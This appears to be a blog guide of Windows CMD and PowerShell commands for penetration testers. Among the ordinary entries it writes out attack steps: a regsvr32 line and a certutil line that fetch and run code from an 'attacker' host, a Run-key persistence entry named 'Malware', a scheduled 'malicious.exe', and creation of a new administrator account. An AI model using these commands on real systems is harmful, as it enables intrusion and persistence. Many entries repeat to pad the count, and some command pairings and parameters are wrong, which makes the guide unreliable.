Windows commands are essential tools for penetration testers and red team operators. Proficiency with these commands empowers effective reconnaissance, exploitation, privilege escalation, and more. In this comprehensive guide, we delve into the 50 most vital Windows commands, providing detailed explanations, command usage examples, and invaluable insights tailored for penetration testers and red team operators.
1. dir
– List Files and Directories
The dir
command is a fundamental tool for reconnaissance on Windows systems:
CMD Usage:
C:\> dir # List files and directories
C:\> dir /s # List files and directories recursively
PowerShell Usage:
PS C:\> Get-ChildItem # List files and directories
PS C:\> Get-ChildItem -Recurse # List files and directories recursively
Tip: Combine with findstr
in CMD or Select-String
in PowerShell to search for specific filenames or keywords.
2. cd
– Change Directory
Navigating directories is essential for accessing target-specific files or locations:
CMD Usage:
C:\> cd Documents # Change to "Documents" directory
PowerShell Usage:
PS C:\> Set-Location Documents # Change to "Documents" directory
Tip: Quickly switch to directories containing sensitive data or configuration files.
3. echo
– Display Text or Enable/Disable Command Echo
The echo
command outputs text to the command prompt or can control command echoing:
CMD Usage:
C:\> echo Hello, world! # Display text
PowerShell Usage:
PS C:\> Write-Output "Hello, world!" # Display text
Tip: Utilize echo
in batch files or Write-Output
in PowerShell scripts.
4. mkdir
– Create Directory
Creating directories is essential for organizing your tools, scripts, and findings:
CMD Usage:
C:\> mkdir Reports # Create "Reports" directory
PowerShell Usage:
PS C:\> New-Item -ItemType Directory -Name Reports # Create "Reports" directory
Tip: Organize your toolkit by creating folders for specific tasks or projects.
5. copy
– Copy Files and Directories
Copying files and directories aids in preserving evidence or deploying payloads:
CMD Usage:
C:\> copy file.txt dir\ # Copy file.txt to dir\
PowerShell Usage:
PS C:\> Copy-Item file.txt dir\ # Copy file.txt to dir\
Tip: Copy malicious files or tools to target systems for exploitation.
6. move
– Move and Rename Files
Moving or renaming files is helpful for concealing your actions or modifying system behavior:
CMD Usage:
C:\> move file.txt newdir\ # Move file.txt to newdir\
PowerShell Usage:
PS C:\> Move-Item file.txt newdir\ # Move file.txt to newdir\
Tip: Rename or move files to evade detection or manipulate system behavior.
7. del
– Delete Files
Deleting files is essential for covering your tracks or removing evidence:
CMD Usage:
C:\> del file.txt # Delete file.txt
PowerShell Usage:
PS C:\> Remove-Item file.txt # Delete file.txt
Tip: Use with caution as this command permanently removes files.
8. type
– Display File Contents
Displaying file contents helps understand system configurations and identify vulnerabilities:
CMD Usage:
C:\> type file.txt
PowerShell Usage:
PS C:\> Get-Content file.txt
Tip: Examine configuration files to uncover sensitive information or vulnerabilities.
9. notepad
– Open Text Files with Notepad
Opening files with Notepad allows quick examination or modification of contents:
CMD Usage:
C:\> notepad file.txt
PowerShell Usage:
PS C:\> notepad file.txt
Tip: Quickly edit configuration files or analyze logs with Notepad.
10. findstr
– Search for Strings in Files
Searching for text patterns is essential for identifying vulnerabilities or sensitive data:
CMD Usage:
C:\> type file.txt | findstr "pattern"
PowerShell Usage:
PS C:\> Get-Content file.txt | Select-String "pattern"
Tip: Uncover vulnerabilities by searching for keywords in configuration files or source code.
11. tasklist
– List Running Processes
Listing processes aids in identifying active applications and potential attack vectors:
CMD Usage:
C:\> tasklist # List running processes
PowerShell Usage:
PS C:\> Get-Process # List running processes
Tip: Detect suspicious processes or unauthorized applications.
12. taskkill
– Terminate Processes
Terminating processes is vital for stopping unwanted or malicious applications:
CMD Usage:
C:\> taskkill /im process.exe /f # Terminate a process by image name
PowerShell Usage:
PS C:\> Stop-Process -Name process.exe -Force # Terminate a process by name
Tip: Halt malicious processes or applications that pose a threat.
13. netstat
– Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connections
PowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connections
Tip: Identify active connections and potential attack vectors.
14. ipconfig
– Display IP Configuration
Viewing IP configuration aids in understanding network settings and potential vulnerabilities:
CMD Usage:
C:\> ipconfig # Display IP configuration
PowerShell Usage:
PS C:\> Get-NetIPAddress # Display IP configuration
Tip: Identify IP addresses, network interfaces, and DNS configurations.
15. ping
– Test Network Connectivity
Testing network connectivity helps identify live hosts and assess network latency:
CMD Usage:
C:\> ping google.com
PowerShell Usage:
PS C:\> Test-Connection google.com
Tip: Determine if a target is reachable and assess network responsiveness.
16. nslookup
– DNS Lookup
Performing DNS lookups is useful for resolving hostnames or IP addresses:
CMD Usage:
C:\> nslookup google.com
PowerShell Usage:
PS C:\> Resolve-DnsName google.com
Tip: Gather information about target systems through DNS records.
17. wmic
– Windows Management Instrumentation Command-line
Interacting with Windows Management Instrumentation helps gather system information:
CMD Usage:
C:\> wmic process list brief
PowerShell Usage:
PS C:\> Get-WmiObject Win32_Process # List processes
Tip: Collect information about processes, services, and hardware configurations.
18. systeminfo
– Display System Information
Viewing system information provides insights into the operating system and hardware:
CMD Usage:
C:\> systeminfo
PowerShell Usage:
PS C:\> Get-ComputerInfo
Tip: Gather details about the system, OS version, and installed updates.
19. reg query
– Query Registry Information
Interacting with the Windows Registry assists in gathering system configuration details:
CMD Usage:
C:\> reg query HKLM\Software\Microsoft\Windows\CurrentVersion /v ProductName
PowerShell Usage:
PS C:\> Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion" -Name "ProductName"
Tip: Extract information from the registry, such as installed software or settings.
20. reg add
and reg delete
– Modify Registry Entries
Modifying registry entries aids in altering system configurations or disabling security settings:
CMD Usage:
C:\> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Malware" /t REG_SZ /d "C:\malware.exe"
PowerShell Usage:
PS C:\> Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Malware" -Value "C:\malware.exe"
Tip: Modify startup entries for persistence or disable security mechanisms.
21. net user
– Manage User Accounts
Managing user accounts is crucial for privilege escalation and lateral movement:
CMD Usage:
C:\> net user newuser newpassword /add # Add a new user
PowerShell Usage:
PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpires
Tip: Exploit weak user accounts or escalate privileges by creating new users.
22. net localgroup
– Manage Local Groups
Managing local groups is essential for privilege escalation and controlling system access:
CMD Usage:
C:\> net localgroup Administrators newuser /add # Add user to Administrators group
PowerShell Usage:
PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"
Tip: Escalate privileges by adding users to high-privileged groups.
23. net share
– Manage Shared Resources
Managing shared resources helps identify vulnerabilities or lateral movement opportunities:
CMD Usage:
C:\> net share # List shared resources
PowerShell Usage:
PS C:\> Get-SmbShare # List shared resources
Tip: Identify exposed file shares for potential exploitation.
24. net use
– Connect to Shared Resources
Connecting to shared resources assists in lateral movement and data exfiltration:
CMD Usage:
C:\> net use \\target\share /user:username password
PowerShell Usage:
PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -Username username -Password (ConvertTo-SecureString -String "password" -AsPlainText -Force)
Tip: Map network drives for easy access to shared resources.
25. netstat
– Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connections
PowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connections
Tip: Identify active connections and potential attack vectors.
26. route
– Display or Modify Network Routing
Displaying or modifying network routing is useful for pivoting or network manipulation:
CMD Usage:
C:\> route print # Display routing table
PowerShell Usage:
PS C:\> Get-NetRoute # Display routing table
Tip: Modify network routing to redirect traffic for exploitation.
27. netsh
– Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profiles
PowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display Wi-Fi profiles
Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.
28. whoami
– Display User and Group Information
Displaying user and group information helps understand available privileges:
CMD Usage:
C:\> whoami
PowerShell Usage:
PS C:\> whoami /groups
Tip: Determine your user context and associated groups for privilege analysis.
29. systeminfo
– Display System Information
Viewing system information provides insights into the operating system and hardware:
CMD Usage:
C:\> systeminfo
PowerShell Usage:
PS C:\> Get-ComputerInfo
Tip: Gather details about the system, OS version, and installed updates.
30. driverquery
– Display Installed Device Drivers
Listing installed device drivers aids in identifying potential vulnerabilities:
CMD Usage:
C:\> driverquery
PowerShell Usage:
PS C:\> Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion
Tip: Identify outdated or vulnerable device drivers for exploitation.
31. sc
– Service Control
Interacting with Windows services helps control system behavior and persistence:
CMD Usage:
C:\> sc query # List all services
PowerShell Usage:
PS C:\> Get-Service # List all services
Tip: Disable or modify services for persistence or to disable security mechanisms.
32. schtasks
– Schedule Tasks
Scheduling tasks aids in persistence and automated exploitation:
CMD Usage:
C:\> schtasks /create /tn "My
Task" /tr "malicious.exe" /sc daily /st 00:00
PowerShell Usage:
PS C:\> Register-ScheduledTask -TaskName "MyTask" -Action (New-ScheduledTaskAction -Execute "malicious.exe") -Trigger (New-ScheduledTaskTrigger -Daily -At 00:00)
Tip: Schedule malicious payloads or backdoors for automated execution.
33. regsvr32
– Register and Unregister DLLs
Registering or unregistering DLLs can aid in executing malicious code or maintaining persistence:
CMD Usage:
C:\> regsvr32 /s /i:http://attacker/evil.sct scrobj.dll # Register with remote content
PowerShell Usage:
PS C:\> rundll32.exe malicious.dll,EntryPoint
Tip: Exploit DLL hijacking vulnerabilities or execute malicious scripts.
34. cipher
– Manage File Encryption
Managing file encryption helps protect sensitive data or manipulate encrypted files:
CMD Usage:
C:\> cipher /e filename.txt # Encrypt file
PowerShell Usage:
PS C:\> Protect-CmsMessage -To recipient@example.com -From sender@example.com -Subject "Encrypted Message" -Body "This is a secret message" -OutFile "encryptedMessage.txt"
Tip: Encrypt files for data exfiltration or manipulate encrypted data.
35. tasklist
– List Running Processes
Listing processes aids in identifying active applications and potential attack vectors:
CMD Usage:
C:\> tasklist # List running processes
PowerShell Usage:
PS C:\> Get-Process # List running processes
Tip: Detect suspicious processes or unauthorized applications.
36. taskkill
– Terminate Processes
Terminating processes is vital for stopping unwanted or malicious applications:
CMD Usage:
C:\> taskkill /im process.exe /f # Terminate a process by image name
PowerShell Usage:
PS C:\> Stop-Process -Name process.exe -Force # Terminate a process by name
Tip: Halt malicious processes or applications that pose a threat.
37. powercfg
– Power Configuration
Interacting with power configurations can assist in controlling system behavior and persistence:
CMD Usage:
C:\> powercfg /hibernate off # Disable hibernation
PowerShell Usage:
PS C:\> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Power" -Name "HibernateEnabled" -Value 0
Tip: Manipulate power settings for system manipulation or preservation.
38. wmic
– Windows Management Instrumentation Command-line
Interacting with Windows Management Instrumentation helps gather system information:
CMD Usage:
C:\> wmic process list brief
PowerShell Usage:
PS C:\> Get-WmiObject Win32_Process # List processes
Tip: Collect information about processes, services, and hardware configurations.
39. msfconsole
– Metasploit Framework Console
Using Metasploit aids in exploiting vulnerabilities and conducting penetration tests:
CMD and PowerShell Usage:
C:\> msfconsole
Tip: Exploit known vulnerabilities using Metasploit’s extensive collection of modules.
40. certutil
– File Utility for Downloading and Displaying Files
Interacting with certificates aids in downloading files or executing malicious payloads:
CMD Usage:
C:\> certutil -urlcache -f http://attacker/malicious.exe C:\malicious.exe
PowerShell Usage:
PS C:\> Invoke-WebRequest -Uri http://attacker/malicious.exe -OutFile C:\malicious.exe
Tip: Download malicious files for exploitation or lateral movement.
41. nmap
– Network Mapping and Port Scanning
Using Nmap assists in network reconnaissance and identifying potential attack vectors:
CMD and PowerShell Usage:
C:\> nmap -sV -p 1-1000 target
Tip: Identify open ports and services on target systems for exploitation.
42. netsh
– Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profiles
PowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display Wi-Fi profiles
Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.
43. net user
– Manage User Accounts
Managing user accounts is crucial for privilege escalation and lateral movement:
CMD Usage:
C:\> net user newuser newpassword /add # Add a new user
PowerShell Usage:
PS C:\> New-LocalUser -Name newuser -Password (ConvertTo-SecureString -String "newpassword" -AsPlainText -Force) -AccountNeverExpires
Tip: Exploit weak user accounts or escalate privileges by creating new users.
44. net localgroup
– Manage Local Groups
Managing local groups is essential for privilege escalation and controlling system access:
CMD Usage:
C:\> net localgroup Administrators newuser /add # Add user to Administrators group
PowerShell Usage:
PS C:\> Add-LocalGroupMember -Group "Administrators" -Member "newuser"
Tip: Escalate privileges by adding users to high-privileged groups.
45. net share
– Manage Shared Resources
Managing shared resources helps identify vulnerabilities or lateral movement opportunities:
CMD Usage:
C:\> net share # List shared resources
PowerShell Usage:
PS C:\> Get-SmbShare # List shared resources
Tip: Identify exposed file shares for potential exploitation.
46. net use
– Connect to Shared Resources
Connecting to shared resources assists in lateral movement and data exfiltr
ation:
CMD Usage:
C:\> net use \\target\share /user:username password
PowerShell Usage:
PS C:\> New-SmbMapping -LocalPath "Z:" -RemotePath "\\target\share" -Username username -Password (ConvertTo-SecureString -String "password" -AsPlainText -Force)
Tip: Map network drives for easy access to shared resources.
47. netstat
– Display Network Statistics
Monitoring network connections helps identify open ports and network activities:
CMD Usage:
C:\> netstat -ano # Display active network connections
PowerShell Usage:
PS C:\> Get-NetTCPConnection # Display active network connections
Tip: Identify active connections and potential attack vectors.
48. route
– Display or Modify Network Routing
Displaying or modifying network routing is useful for pivoting or network manipulation:
CMD Usage:
C:\> route print # Display routing table
PowerShell Usage:
PS C:\> Get-NetRoute # Display routing table
Tip: Modify network routing to redirect traffic for exploitation.
49. netsh
– Network Shell
Interacting with network settings and configurations helps manipulate network behavior:
CMD Usage:
C:\> netsh wlan show profiles # Display Wi-Fi profiles
PowerShell Usage:
PS C:\> Get-NetConnectionProfile # Display Wi-Fi profiles
Tip: Manipulate firewall rules or discover saved Wi-Fi passwords.
50. whoami
– Display User and Group Information
Displaying user and group information helps understand available privileges:
CMD Usage:
C:\> whoami
PowerShell Usage:
PS C:\> whoami /groups
Tip: Determine your user context and associated groups for privilege analysis.
Mastering these 50 Windows commands is a crucial step toward becoming a skilled penetration tester or red team operator. By honing your skills with these tools, you’ll be well-equipped to navigate a variety of scenarios, from reconnaissance to exploitation and beyond. As you continually refine your abilities, delve into more advanced Windows concepts and expand your toolkit, you’ll develop the expertise needed to excel in the dynamic field of cybersecurity. Best of luck in your journey of penetration testing and red teaming!